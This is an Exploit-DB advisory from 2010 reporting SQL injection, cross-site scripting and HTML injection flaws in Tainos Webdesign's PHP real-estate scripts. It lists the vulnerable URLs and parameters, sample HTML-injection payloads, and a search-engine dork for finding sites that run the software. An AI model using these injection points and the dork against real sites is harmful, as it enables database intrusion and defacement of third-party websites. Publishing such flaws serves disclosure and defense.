Tainos Webdesign (All Scripts) - SQL Injection / Cross-Site Scripting / HTML Injection

EDB-ID:

12631

CVE:

N/A

EDB Verified:

Author:

CoBRa_21

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2010-05-17

Vulnerable App:

-------------------------------------------------------------------------------------------

Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Mail: uyku_cu@windowslive.com

Script Home: http://www.tainos-webdesign.com

Dork: intext:"© Tainos Webdesign"

-------------------------------------------------------------------------------------------

Sql Injection:

http://localhost/[path]/propertylux.php?ID=1 (SQL)
http://localhost/[path]/property.php?ID=199 (SQL)

-------------------------------------------------------------------------------------------

XSS Injection:

http://localhost/[path]/class.php?Class=Rental&Subclass=
http://localhost/[path]/class.php?Class=Sales&Subclass=
http://localhost/[path]/classlux.php?Class=Luxury&Subclass=
-------------------------------------------------------------------------------------------

HTML Injection:

http://localhost/[path]/class.php?Class=Rental&Subclass=<font color=red size=15>CoBRa_21</font>
http://localhost/[path]/class.php?Class=Sales&Subclass=<font color=red size=15>CoBRa_21</font>
http://localhost/[path]/classlux.php?Class=Luxury&Subclass=<font color=red size=15>CoBRa_21</font>
-------------------------------------------------------------------------------------------

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services